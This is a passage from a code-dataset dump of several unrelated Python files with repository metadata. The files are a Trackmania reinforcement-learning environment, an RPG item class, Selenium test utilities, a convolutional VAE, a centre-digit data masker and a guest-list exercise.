Trackmania.\n\n ### Parameters\n map_path : str\n Path to processed track file.\n obs_history : int, (default 0)\n Number of previous inputs to keep in the observation.\n action_history : int, (default 2)\n Number of previous actions to keep in the observation.\n The total number of previous actions will be equal to:\n obs_history + action_history.\n action_duration : float, (default 0.05)\n Desired amount of time between obtaining an observation and sending an action in seconds.\n If it takes less than action_duration, the thread will wait the rest of the time.\n If it takes more, the thread will print a timeout.\n obs_duration : float, (default 0.0021)\n Desired amount of time between sending an action and obtaining an observation in seconds.\n If it takes less than obs_duration, the thread will wait the rest of the time.\n If it takes more, the thread will print a timeout.\n start_delay : float, (default 1.9)\n The amount of time to wait after each restart (waiting for the countdown).\n If training, leave the default value.\n If validating, set to 0.0\n human_driver : bool, (default False)\n If True, env will not apply any action.\n \"\"\"\n\n super().__init__()\n wall_lasers=13\n\n # *** ACTION SPACE ***\n\n self.action_space = spaces.Box(\n # steer, gas/brake\n np.array([-1, -1], dtype=np.float32),\n np.array([1, 1], dtype=np.float32)\n )\n\n self.obs_history = obs_history\n self.action_history = action_history\n\n # *** OBSERVATION SPACE ***\n \n self.observation_space = spaces.Box(\n np.array(\n [-1, -1]*(self.obs_history+self.action_history) + \\\n [0]*(wall_lasers+2)*(self.obs_history+1),\n \n dtype=np.float32\n ),\n np.array(\n [1, 1]*(self.obs_history+self.action_history) + \\\n [1]*(wall_lasers+2)*(self.obs_history+1),\n \n dtype=np.float32\n )\n )\n\n # *** SETUP ***\n\n # flipping mechanism\n self.flip = True\n\n # respawning (true first time)\n self.done = False\n self.lap_time = None\n self.start_delay = start_delay\n \n # timestep equalizer\n self.action_duration = action_duration\n self.obs_duration = obs_duration\n\n # human driver mode\n self.human = human_driver\n\n # load map\n self.map = get_map_data(map_path)\n self.map_centerline = self.map.reshape((-1,2,2)).sum(axis=1)/2 # x, y\n self.next_checkpoint = 1\n self.location = np.array([0,0], dtype=np.float32)\n self.prev_projection = np.array([0,0], dtype=np.float32)\n self.direction = np.array([0,0], dtype=np.float32)\n self.prev_distance = 0.0\n\n # setup Trackmania bridge\n self.data_getter = 
GameDataGetter()\n\n # setup visualizer and lidar\n self.visualizer = TrackVisualizer(self.map)\n self.wall_number = wall_lasers\n\n # obs buffer\n self.obs_buffer = np.array(\n [0, 0]*(self.obs_history+self.action_history) + \\\n [0]*(wall_lasers+2)*(self.obs_history+1),\n\n dtype=np.float32\n )\n prev_action_range = 2*(self.obs_history+self.action_history)\n speed_range = self.obs_history + 1 + prev_action_range\n wall_contact_range = self.obs_history + 1 + speed_range\n\n self.view_buffer = self.obs_buffer[wall_contact_range:]\n self.wall_contact_buffer = self.obs_buffer[speed_range:wall_contact_range]\n self.speed_buffer = self.obs_buffer[prev_action_range:speed_range]\n self.prev_action_buffer = self.obs_buffer[:prev_action_range]\n\n # *** GAME MANIP ***\n\n def respawn(self):\n \"\"\"Respawns the car to the start.\n \"\"\"\n tm_reset()\n tm_update()\n tm_respawn()\n if self.start_delay > 0.0:\n time.sleep(self.start_delay)\n\n self.next_checkpoint = 1\n self.location[0] = self.data_getter.game_data[GameDataGetter.I_X]\n self.location[1] = self.data_getter.game_data[GameDataGetter.I_Z]\n self.prev_projection = self.location.copy()\n self.prev_distance = 0.0\n #self.threshold_speed = False\n self.flip = not self.flip\n for i in range(self.obs_history+self.action_history):\n self.refresh_observation()\n\n\n def refresh_observation(self):\n \"\"\"Obtains the observation and updates the buffer.\n \"\"\"\n # get info from the game\n self.location[0] = self.data_getter.game_data[GameDataGetter.I_X]\n self.location[1] = self.data_getter.game_data[GameDataGetter.I_Z]\n self.direction[0] = self.data_getter.game_data[GameDataGetter.I_DX]\n self.direction[1] = self.data_getter.game_data[GameDataGetter.I_DZ]\n\n # overwrite\n self.view_buffer[:-self.wall_number] = self.view_buffer[self.wall_number:]\n self.speed_buffer[:-1] = self.speed_buffer[1:]\n self.wall_contact_buffer[:-1] = self.wall_contact_buffer[1:]\n \n # add new\n view = self.visualizer.lidar(self.location, TrackmaniaEnv.vector_angle(self.direction), show=False)\n if self.flip:\n view = np.flip(view)\n self.view_buffer[-self.wall_number:] = view\n\n speed = self.data_getter.game_data[\n GameDataGetter.I_SPEED\n ]*0.0036\n self.speed_buffer[-1] = speed\n \n self.wall_contact_buffer[-1] = float((self.view_buffer[-self.wall_number:] < TrackVisualizer.CONTACT_THRESHOLD).any())\n\n\n def apply_action(self, action:np.ndarray):\n \"\"\"Applies the given action.\n\n ### Parameters\n action : np.ndarray\n Array of two floats [-1,1] indicating, respectively, steering and throttle/braking.\n \"\"\"\n # overwrite\n self.prev_action_buffer[:-2] = self.prev_action_buffer[2:]\n \n # add new\n self.prev_action_buffer[-2:] = action\n\n if self.flip:\n action[0] = -action[0]\n \n if not self.human:\n tm_reset()\n\n tm_steer(action[0])\n if action[1] > 0.0:\n tm_accelerate(action[1])\n elif self.data_getter.game_data[GameDataGetter.I_GEAR] > 0.1 and self.speed_buffer[-1] > 0.02:\n tm_brake(-action[1])\n \n tm_update()\n\n # *** UTILITIES ***\n\n def norm(x):\n return math.sqrt(x[0]**2 + x[1]**2)\n\n \n def cross_product(x, y):\n return x[0]*y[1] - x[1]*y[0]\n\n\n def vector_angle(r):\n n = TrackmaniaEnv.norm(r)\n if n == 0.0:\n return 0.0\n v = r[0]/n\n θ = math.acos(v)\n if r[1] < 0:\n θ *= -1\n return θ\n\n\n def vector_intersection(p, r, q, s):\n rxs = TrackmaniaEnv.cross_product(r, s)\n qmp = q - p\n qpxs = TrackmaniaEnv.cross_product(qmp, s)\n qpxr = TrackmaniaEnv.cross_product(qmp, r)\n if rxs == 0:\n return None\n t = qpxs/rxs\n u = qpxr/rxs\n 
if t >= 0 and t <= 1 and u >= 0 and u <= 1:\n return p + t*r\n return None\n\n \n def normal_projection(a, b, p):\n v = a - b\n v /= TrackmaniaEnv.norm(v)\n w = p - b\n return b + v*(w[0]*v[0] + w[1]*v[1])\n \n # *** ENV ESSENTIALS ***\n \n def calc_reward(self):\n # calc distance travelled between two steps\n centerline_distance = 0.0\n finish = False\n\n # negative direction vector\n v = -self.direction*100\n\n # checkpoints\n w = self.map[self.next_checkpoint][0:2] - self.map[self.next_checkpoint][2:4]\n while not TrackmaniaEnv.vector_intersection(\n self.location,\n v,\n self.map[self.next_checkpoint][2:4],\n w\n ) is None:\n centerline_distance += TrackmaniaEnv.norm(self.map_centerline[self.next_checkpoint] - self.prev_projection)\n self.prev_projection = self.map_centerline[self.next_checkpoint]\n self.next_checkpoint += 1\n if self.next_checkpoint >= len(self.map_centerline):\n self.next_checkpoint = 1\n self.done = True\n finish = True\n w = self.map[self.next_checkpoint][0:2] - self.map[self.next_checkpoint][2:4]\n\n projection = TrackmaniaEnv.normal_projection(\n self.map_centerline[self.next_checkpoint],\n self.map_centerline[self.next_checkpoint - 1],\n self.location\n )\n\n # check right orientation\n \n car_angle = TrackmaniaEnv.vector_angle(-v)\n centerline_angle = TrackmaniaEnv.vector_angle(self.map_centerline[self.next_checkpoint] - self.map_centerline[self.next_checkpoint-1])\n\n # delta angle between centerline and direction\n d_angle = car_angle - centerline_angle\n\n if d_angle > math.pi: d_angle -= 2*math.pi\n elif d_angle < -math.pi: d_angle += 2*math.pi\n\n if abs(d_angle) > math.pi/2:\n self.done = True\n \n if self.flip:\n d_angle = - d_angle\n\n centerline_distance += TrackmaniaEnv.norm(self.prev_projection - projection)\n self.prev_projection = projection\n\n # check wall contact\n penalty = 0.0\n if self.wall_contact_buffer[-1]:\n penalty = (self.speed_buffer[-1]**2) * 512.0\n\n # check stopped\n if time.time() - self.start_time > 5.0 and self.speed_buffer[-1] < 0.005:\n self.done = True\n \n if finish or bool(self.data_getter.game_data[GameDataGetter.I_FINISH]):\n self.lap_time = round(time.time() - self.start_time, 3)\n self.done = True\n\n return centerline_distance - penalty\n\n\n def reset(self, seed=None, options=None):\n self.done = False\n\n self.respawn()\n\n self.start_time = time.time()\n self.action_time = time.time()\n return self.obs_buffer, {}\n\n\n def step(self, action):\n self.lap_time = None\n\n # action\n self.action_time = time.time() - self.action_time\n if self.action_duration > self.action_time:\n time.sleep(self.action_duration - self.action_time)\n else:\n print(\"Action timeout: \", self.action_time - self.action_duration)\n\n self.apply_action(action)\n \n # observation\n obs_time = time.time()\n \n self.refresh_observation()\n reward = self.calc_reward()\n\n obs_time = time.time() - obs_time\n if self.obs_duration > obs_time:\n time.sleep(self.obs_duration - obs_time)\n else:\n print(\"Observation timeout: \", obs_time - self.obs_duration)\n\n # time next action\n self.action_time = time.time()\n \n return self.obs_buffer, reward, self.done, False, {}\n\n\nif __name__ == '__main__':\n env = TrackmaniaEnv('.\\\\Maps\\\\Nascar2.Map.txt', human_driver=False)\n #check_env(env)\n for i in range(2):\n gamma = 0.999\n total = 0\n env.reset()\n done = False\n while not done:\n obs, rew, done, _, __ = env.step([0,0])\n total += gamma*rew\n gamma*=0.999\n print(total)\n 
continue","repo_name":"AndrejGobeX/TrackMania_AI","sub_path":"TrackmaniaEnv.py","file_name":"TrackmaniaEnv.py","file_ext":"py","file_size_in_byte":10920,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"40"} +{"seq_id":"18451727745","text":"class Item:\n\n def __init__(self, new_name, new_damage, new_heal, new_add_armor, new_add_strenght, new_cost_stamina, new_price):\n self.name = new_name\n self.damage = new_damage\n self.heal = new_heal\n self.armor = new_add_armor\n self.strenght = new_add_strenght\n self.cost_stamina = new_cost_stamina\n self.price = new_price\n","repo_name":"Wizer21/Rpg","sub_path":"items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27903545861","text":"import os\n\nimport pytest\nfrom selenium import webdriver\nfrom selenium.common.exceptions import (\n ElementClickInterceptedException,\n JavascriptException,\n NoSuchElementException,\n StaleElementReferenceException,\n TimeoutException,\n)\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom seleniumrequests.request import RequestsSessionMixin\n\nfrom baselayer.app import models\nfrom baselayer.app.config import load_config\n\ncfg = load_config()\n\n\ndef set_server_url(server_url):\n \"\"\"Set web driver server URL using value loaded from test config file.\"\"\"\n MyCustomWebDriver.server_url = server_url\n\n\nclass MyCustomWebDriver(RequestsSessionMixin, webdriver.Firefox):\n @property\n def server_url(self):\n if not hasattr(self, \"_server_url\"):\n raise NotImplementedError(\n \"Please first set the web driver URL\" \" using `set_server_url`\"\n )\n return self._server_url\n\n @server_url.setter\n def server_url(self, value):\n self._server_url = value\n\n def get(self, uri):\n webdriver.Firefox.get(self, self.server_url + uri)\n try:\n self.find_element(By.ID, \"websocketStatus\")\n self.wait_for_xpath(\n \"//*[@id='websocketStatus' and contains(@title,'connected')]\"\n )\n except NoSuchElementException:\n pass\n\n def wait_for_xpath(self, xpath, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.presence_of_element_located((By.XPATH, xpath))\n )\n\n def wait_for_css(self, css, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.presence_of_element_located((By.CSS_SELECTOR, css))\n )\n\n def wait_for_xpath_to_appear(self, xpath, timeout=10):\n return WebDriverWait(self, timeout).until_not(\n expected_conditions.invisibility_of_element((By.XPATH, xpath))\n )\n\n def wait_for_xpath_to_disappear(self, xpath, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.invisibility_of_element((By.XPATH, xpath))\n )\n\n def wait_for_css_to_disappear(self, css, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.invisibility_of_element((By.CSS_SELECTOR, css))\n )\n\n def wait_for_xpath_to_be_clickable(self, xpath, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.element_to_be_clickable((By.XPATH, xpath))\n )\n\n def wait_for_xpath_to_be_unclickable(self, xpath, timeout=10):\n return WebDriverWait(self, timeout).until_not(\n expected_conditions.element_to_be_clickable((By.XPATH, xpath))\n )\n\n def 
wait_for_css_to_be_clickable(self, css, timeout=10):\n return WebDriverWait(self, timeout).until(\n expected_conditions.element_to_be_clickable((By.CSS_SELECTOR, css))\n )\n\n def wait_for_css_to_be_unclickable(self, css, timeout=10):\n return WebDriverWait(self, timeout).until_not(\n expected_conditions.element_to_be_clickable((By.CSS_SELECTOR, css))\n )\n\n def scroll_to_element(self, element, scroll_parent=False):\n scroll_script = (\n \"\"\"\n arguments[0].scrollIntoView();\n \"\"\"\n if scroll_parent\n else \"\"\"\n const viewPortHeight = Math.max(document.documentElement.clientHeight, window.innerHeight || 0);\n const elementTop = arguments[0].getBoundingClientRect().top;\n window.scrollBy(0, elementTop - (viewPortHeight / 2));\n \"\"\"\n )\n self.execute_script(scroll_script, element)\n\n def scroll_to_element_and_click(self, element, timeout=10, scroll_parent=False):\n self.scroll_to_element(element, scroll_parent=scroll_parent)\n ActionChains(self).move_to_element(element).perform()\n\n try:\n return element.click()\n except ElementClickInterceptedException:\n pass\n except StaleElementReferenceException:\n pass\n\n try:\n return self.execute_script(\"arguments[0].click();\", element)\n except JavascriptException:\n pass\n except StaleElementReferenceException:\n pass\n\n # Tried to click something that's not a button, try sending\n # a mouse click to that coordinate\n ActionChains(self).click().perform()\n\n def click_xpath(self, xpath, wait_clickable=True, timeout=10, scroll_parent=False):\n if wait_clickable:\n element = self.wait_for_xpath_to_be_clickable(xpath, timeout=timeout)\n else:\n element = self.wait_for_xpath(xpath)\n return self.scroll_to_element_and_click(element, scroll_parent=scroll_parent)\n\n def click_css(self, css, timeout=10, scroll_parent=False):\n element = self.wait_for_css_to_be_clickable(css, timeout=timeout)\n return self.scroll_to_element_and_click(element, scroll_parent=scroll_parent)\n\n\n@pytest.fixture(scope=\"session\")\ndef driver(request):\n from selenium import webdriver\n\n options = webdriver.firefox.options.Options()\n if \"BASELAYER_TEST_HEADLESS\" in os.environ:\n options.headless = True\n options.set_preference(\"devtools.console.stdout.content\", True)\n options.set_preference(\"browser.download.manager.showWhenStarting\", False)\n options.set_preference(\"browser.download.folderList\", 2)\n options.set_preference(\n \"browser.download.dir\", os.path.abspath(cfg[\"paths.downloads_folder\"])\n )\n options.set_preference(\n \"browser.helperApps.neverAsk.saveToDisk\",\n (\n \"text/csv,text/plain,application/octet-stream,\"\n \"text/comma-separated-values,text/html\"\n ),\n )\n\n driver = MyCustomWebDriver(options=options)\n driver.set_window_size(1920, 1200)\n login(driver)\n\n yield driver\n\n driver.close()\n\n\ndef login(driver):\n username_xpath = '//*[contains(string(),\"testuser-cesium-ml-org\")]'\n\n driver.get(\"/\")\n try:\n driver.wait_for_xpath(username_xpath, 0.25)\n return # Already logged in\n except TimeoutException:\n pass\n\n try:\n element = driver.wait_for_xpath(\n '//a[contains(@href,\"/login/google-oauth2\")]', 20\n )\n element.click()\n except TimeoutException:\n pass\n\n try:\n driver.wait_for_xpath(username_xpath, 5)\n except TimeoutException:\n raise TimeoutException(\"Login failed:\\n\" + driver.page_source)\n\n\n@pytest.fixture(scope=\"function\", autouse=True)\ndef reset_state(request):\n def teardown():\n models.DBSession().rollback()\n\n 
request.addfinalizer(teardown)\n","repo_name":"cesium-ml/baselayer","sub_path":"app/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":6881,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"23212766745","text":"###############################################################################\n# #\n# This program is free software: you can redistribute it and/or modify #\n# it under the terms of the GNU General Public License as published by #\n# the Free Software Foundation, either version 3 of the License, or #\n# (at your option) any later version. #\n# #\n# This program is distributed in the hope that it will be useful, #\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\n# GNU General Public License for more details. #\n# #\n# You should have received a copy of the GNU General Public License #\n# along with this program. If not, see . #\n# #\n###############################################################################\n\nfrom tensorflow.keras.layers import Lambda, Input, Dense, BatchNormalization, Conv2D, Conv2DTranspose, Concatenate\nimport tensorflow as tf\nimport numpy as np\nfrom scivae import VAE\n\n\nfrom tensorflow.keras.layers import Dropout\n\nclass ConvVAE(VAE):\n\n \"\"\"\n References:\n https://www.tensorflow.org/tutorials/generative/cvae\n\n \"\"\"\n\n def __init__(self, input_data_np: np.array, output_data_np: np.array, labels: list, config, vae_label=None,\n sciutil=None, config_as_str=False, empty=False):\n\n super().__init__(input_data_np, output_data_np, labels, config, vae_label, sciutil, config_as_str, empty)\n self.__last_encoding_shape = None\n\n def default_inputs(self):\n if self.multi_output:\n # The first one always has to be 2D and second 1D\n self.inputs_x = [Input(shape=(self.input_size[0][0], self.input_size[0][1], 1), name='default_input_0'),\n Input(shape=(self.input_size[1],), name='default_input_1')]\n else:\n self.inputs_x = Input(shape=(self.input_size[0], self.input_size[1], 1), name='default_input')\n return self.inputs_x\n\n def build_encoder(self):\n # Check if multi - if so we need to concatenate our layers see:\n # https://github.com/CancerAI-CL/IntegrativeVAEs/blob/master/code/models/xvae.py\n layer_start_idx = 0\n if self.multi_output:\n # If we have a fist layer if\n layer = self.encoding_config['layers'][0]\n # ToDo: refactor to handle arbitary number of inputs\n # For now we just need to ensure the first two layers are encoded separately\n # The first one is built using a conv layer\n encoding_0 = self.build_encoding_layer(layer, self.inputs_x[0], layer['activation_fn'])\n # We need to add a dense layer to combine these, we can't simply concatenate them because 1 is\n # a\n self.encoding = [encoding_0]\n layer_start_idx = 1 # Since we have already done the first\n else:\n self.encoding = self.inputs_x\n # Now for subsequent layers we run this\n for layer_idx in range(layer_start_idx, len(self.encoding_config['layers'])):\n layer = self.encoding_config['layers'][layer_idx]\n # Again here we're only encoding the input data rather than the labels as well\n if self.multi_output:\n self.encoding[0] = self.build_encoding_layer(layer, self.encoding[0], layer['activation_fn'])\n else:\n self.encoding = self.build_encoding_layer(layer, self.encoding, layer['activation_fn'])\n\n if self.multi_output:\n self.__last_encoding_shape = [self.encoding[0].shape] # We just pass the label 
through\n else:\n self.__last_encoding_shape = self.encoding.shape\n return self.encoding\n\n def build_decoder(self):\n # Generate input to the decoder which is based on random sampling (we then compare this to the reconstructed\n # values using the input as our output\n self.latent_inputs = Input(shape=(self.latent_config['num_nodes'],), name='z_sampling')\n self.decoding = self.latent_inputs\n # Here we also need to check for the multi output if so we don't do the last layer normally\n layer_end_idx = len(self.decoding_config['layers'])\n # Add in the first one which requires a reshape from the dense latent space\n s = self.__last_encoding_shape # ToDo: make more general Only doing this for 2D conv\n if self.multi_output:\n self.decoding = [Dense(units=s[0][1] * s[0][2] * s[0][3], activation=tf.nn.relu)(self.decoding),\n Dense(units=s[0][1] * s[0][2] * s[0][3], activation=tf.nn.relu)(self.decoding)]\n # Here we reshape one of them but keep the other as just normal output rather than CNN\n self.decoding[0] = tf.keras.layers.Reshape(target_shape=(s[0][1], s[0][2], s[0][3]))(self.decoding[0])\n else:\n self.decoding = Dense(units=s[1] * s[2] * s[3], activation=tf.nn.relu)(self.decoding)\n self.decoding = tf.keras.layers.Reshape(target_shape=(s[1], s[2], s[3]))(self.decoding)\n for layer_idx in range(1, layer_end_idx - 1):\n layer = self.decoding_config['layers'][layer_idx]\n if self.multi_output:\n self.decoding[0] = self.build_decoding_layer(layer[0], self.decoding[0], layer[0]['activation_fn'])\n self.decoding[1] = self.build_layer(layer[1]['num_nodes'], self.decoding[1], layer[1]['activation_fn'])\n else:\n self.decoding = self.build_decoding_layer(layer, self.decoding, layer['activation_fn'])\n\n # Build the last layer\n if self.multi_output:\n self.decoding = self.build_multi_output([self.decoding[0], self.decoding[1]])\n else:\n self.decoding = self.build_decoding_layer(self.decoding_config['layers'][-1], self.decoding,\n self.output_activation_fn)\n return self.decoding\n\n def build_multi_output(self, decoding_layer):\n \"\"\" ToDo: Modularise this to have an arbitary number of layers.\n Note: the way this currently works, the labels have to be the second option and the data is the first! 
\"\"\"\n # Add in the final layer\n decoder_0 = self.build_decoding_layer(self.decoding_config['layers'][-1][0], decoding_layer[0],\n self.output_activation_fn)\n\n # Add in final layer for decoder 2\n decoder_1 = self.build_layer(self.decoding_config['layers'][-1][1]['num_nodes'], decoding_layer[1],\n self.output_activation_fn)\n decoder_1 = self.build_layer(self.output_size[1], decoder_1, self.output_activation_fn)\n return [decoder_0, decoder_1]\n\n def build_encoding_layer(self, layer, prev_layer, activation_fn='selu'):\n filters = layer.get('filters')\n kernel_size = layer.get('kernel_size')\n pooling = layer.get('pooling')\n strides = layer.get('strides')\n padding = layer.get('padding')\n x = Conv2D(filters=filters, kernel_size=kernel_size, padding=padding, strides=strides,\n activation=activation_fn)(prev_layer)\n dropout = layer.get('dropout')\n if dropout:\n x = Dropout(dropout)(x)\n # Perform batch normalisation\n if self.batch_norm:\n x = BatchNormalization()(x)\n return x\n\n def build_decoding_layer(self, layer, prev_layer, activation_fn='selu'):\n filters = layer.get('filters')\n kernel_size = layer.get('kernel_size')\n pooling = layer.get('pooling')\n strides = layer.get('strides')\n padding = layer.get('padding')\n x = Conv2DTranspose(filters=filters, kernel_size=kernel_size, padding=padding, strides=strides,\n activation=activation_fn)(prev_layer)\n dropout = layer.get('dropout')\n if dropout:\n x = Dropout(dropout)(x)\n # Perform batch normalisation\n if self.batch_norm:\n x = BatchNormalization()(x)\n return x\n\n def build_embedding(self):\n # Flatten before encoding!\n # Check if it's the multi because we now combine it\n if self.multi_output:\n # Flatten the layers and concat our labels and the\n self.encoding = tf.keras.layers.Flatten()(self.encoding[0])\n else:\n self.encoding = tf.keras.layers.Flatten()(self.encoding)\n self.latent_z_mean = Dense(self.latent_config['num_nodes'], name='z_mean')(self.encoding)\n self.latent_z_log_sigma = Dense(self.latent_config['num_nodes'], name='z_log_sigma',\n kernel_initializer='zeros')(self.encoding)\n self.latent_z = Lambda(self.sample, output_shape=(self.latent_config['num_nodes'],), name='z')([\n self.latent_z_mean, self.latent_z_log_sigma])\n","repo_name":"ArianeMora/scivae","sub_path":"scivae/conv_vae.py","file_name":"conv_vae.py","file_ext":"py","file_size_in_byte":9332,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"41632211026","text":"from re import findall\nfrom typing import Any, List, Tuple, Union\n\nfrom math import ceil, floor\n\nfrom watchmen_data_kernel.common import DataKernelException\nfrom watchmen_model.admin import FactorEncryptMethod\nfrom watchmen_utilities import ArrayHelper\nfrom .encryptor import Encryptor\n\n\nclass CenterMasker(Encryptor):\n\tdef __init__(self, digits: int):\n\t\tself.digits = digits\n\t\tif digits == 3:\n\t\t\tself.method = FactorEncryptMethod.MASK_CENTER_3\n\t\telif digits == 5:\n\t\t\tself.method = FactorEncryptMethod.MASK_CENTER_5\n\t\telse:\n\t\t\traise DataKernelException(f'Only 3 or 5 digits center mask is supported, current is [{digits}].')\n\n\tdef accept(self, method: Union[FactorEncryptMethod, str]) -> bool:\n\t\treturn method == self.method\n\n\tdef is_encrypted(self, value: Any) -> bool:\n\t\t\"\"\"\n\t\talways returns false\n\t\t\"\"\"\n\t\treturn False\n\n\tdef do_encrypt_as_normal(self, value: str, length: int) -> str:\n\t\tdigits = self.digits\n\t\tremains = length - digits\n\t\tif remains % 2 == 
1:\n\t\t\tpad_count = floor(remains / 2)\n\t\t\treturn f'{value[:pad_count + 1]}{\"*\" * digits}{value[length - pad_count:]}'\n\t\telse:\n\t\t\tpad_count = int(remains / 2)\n\t\t\treturn f'{value[:pad_count]}{\"*\" * digits}{value[length - pad_count:]}'\n\n\t# noinspection PyMethodMayBeStatic\n\tdef replace_from_left(self, segment: str, remain_chars_count: int) -> Tuple[int, str]:\n\t\tchar_count = len(segment)\n\t\tif char_count >= remain_chars_count:\n\t\t\treturn 0, f'{\"*\" * remain_chars_count}{segment[remain_chars_count:]}'\n\t\telse:\n\t\t\treturn remain_chars_count - char_count, '*' * char_count\n\n\t# noinspection PyMethodMayBeStatic\n\tdef replace_from_right(self, segment: str, remain_chars_count: int) -> Tuple[int, str]:\n\t\tchar_count = len(segment)\n\t\tif char_count >= remain_chars_count:\n\t\t\treturn 0, f'{segment[:0 - remain_chars_count]}{\"*\" * remain_chars_count}'\n\t\telse:\n\t\t\treturn remain_chars_count - char_count, '*' * char_count\n\n\tdef do_encrypt(self, value: Any) -> Any:\n\t\tdigits = self.digits\n\n\t\tvalue = str(value)\n\t\tlength = len(value)\n\t\tif length <= digits:\n\t\t\t# mask all\n\t\t\treturn '*' * length\n\n\t\t# last part is empty, ignored\n\t\tsegments = ArrayHelper(findall(r'((\\d+|\\D*)?)', value)[:-1]).map(lambda x: x[0]).to_list()\n\t\tdecimal_char_count = ArrayHelper(segments).filter(lambda x: x.isdecimal()) \\\n\t\t\t.reduce(lambda count, x: count + len(x), 0)\n\t\tif decimal_char_count < digits:\n\t\t\t# no enough decimal characters, mask as normal string\n\t\t\treturn self.do_encrypt_as_normal(value, length)\n\n\t\tdecimal_count = len([segment for segment in segments if segment.isdecimal()])\n\t\tif decimal_count == 1:\n\t\t\t# only one part\n\t\t\treplaced_segments = []\n\t\t\tfor segment in segments:\n\t\t\t\tif segment.isdecimal():\n\t\t\t\t\treplaced_segments.append(f'{\"*\" * digits}{segment[digits:]}')\n\t\t\t\telse:\n\t\t\t\t\treplaced_segments.append(segment)\n\t\t\treturn ''.join(replaced_segments)\n\n\t\t# at least 2 decimal parts\n\t\tcentral_index = ceil((decimal_count + 1) / 2)\n\t\tindex = 0\n\n\t\treplaced_segments: List[str] = []\n\t\tcurrent_index = central_index\n\t\tremain_count = digits\n\n\t\tfor segment in segments:\n\t\t\tif segment.isdecimal():\n\t\t\t\tindex = index + 1\n\t\t\t\tif index == current_index:\n\t\t\t\t\tremain_count, replaced = self.replace_from_left(segment, remain_count)\n\t\t\t\t\treplaced_segments.append(replaced)\n\t\t\t\t\tif remain_count != 0:\n\t\t\t\t\t\t# try to replace next decimal segment\n\t\t\t\t\t\tcurrent_index = current_index + 1\n\t\t\t\telse:\n\t\t\t\t\treplaced_segments.append(segment)\n\t\t\telse:\n\t\t\t\treplaced_segments.append(segment)\n\n\t\tif remain_count == 0:\n\t\t\treturn ''.join(replaced_segments)\n\t\telse:\n\t\t\t# still not enough characters, try to look backward\n\t\t\tcurrent_index = central_index - 1\n\t\t\twhile current_index > 0:\n\t\t\t\tsegments = replaced_segments\n\t\t\t\treplaced_segments = []\n\t\t\t\tindex = 0\n\t\t\t\tfor segment in segments:\n\t\t\t\t\tif segment.isdecimal():\n\t\t\t\t\t\tindex = index + 1\n\t\t\t\t\t\tif index == current_index:\n\t\t\t\t\t\t\tremain_count, replaced = self.replace_from_right(segment, remain_count)\n\t\t\t\t\t\t\treplaced_segments.append(replaced)\n\t\t\t\t\t\t\tif remain_count != 0:\n\t\t\t\t\t\t\t\t# look backward again\n\t\t\t\t\t\t\t\tcurrent_index = current_index - 1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t# break\n\t\t\t\t\t\t\t\tcurrent_index = 
0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\treplaced_segments.append(segment)\n\t\t\t\t\telse:\n\t\t\t\t\t\treplaced_segments.append(segment)\n\t\t\treturn ''.join(replaced_segments)\n\n\tdef do_decrypt(self, value: str) -> str:\n\t\t# center mask cannot be decrypted\n\t\treturn value\n\n\tdef get_key_type(self) -> str:\n\t\treturn self.method.value\n","repo_name":"Indexical-Metrics-Measure-Advisory/watchmen","sub_path":"packages/watchmen-data-kernel/src/watchmen_data_kernel/encryption/center_masker.py","file_name":"center_masker.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"}
{"seq_id":"9041386758","text":"guest_count = int(input())\n\nregular = []\nvip = []\n\nexpected_guests = []\n\nfor x in range(guest_count):\n    guest = input()\n    expected_guests.append(guest)\n\ncommand = input()\n\nwhile command != \"END\":\n    current_guest = command\n    if current_guest in expected_guests:\n        expected_guests.remove(current_guest)\n    command = input()\n\nfor x in expected_guests:\n    for letter in x:\n        if letter.isdigit():\n            vip.append(x)\n            break\n    else:\n        regular.append(x)\nprint(len(expected_guests))\n\nfor i in sorted(vip):\n    print(i)\n\nfor j in sorted(regular):\n    print(j)\n\n\n#\n# n = int(input())\n#\n# vip_guests = set()\n# regular_guests = set()\n#\n# for _ in range(n):\n#     ticket = input()\n#     if ticket[0].isdigit() and len(ticket) == 8:\n#         vip_guests.add(ticket)\n#     elif len(ticket) == 8:\n#         regular_guests.add(ticket)\n#\n# guest = input()\n#\n# not_on_the_party = []\n#\n# while guest != \"END\":\n#     if guest in vip_guests:\n#         vip_guests.remove(guest)\n#     elif guest in regular_guests:\n#         regular_guests.remove(guest)\n#     guest = input()\n#\n# print(len(vip_guests) + len(regular_guests))\n#\n# for i in sorted(vip_guests):\n#     print(i)\n# for j in sorted(regular_guests):\n#     print(j)","repo_name":"ZvezdelinaPetrova/Softuni","sub_path":"advanced/tulips and sets/lab/05. SoftUni Party.py","file_name":"05. SoftUni Party.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
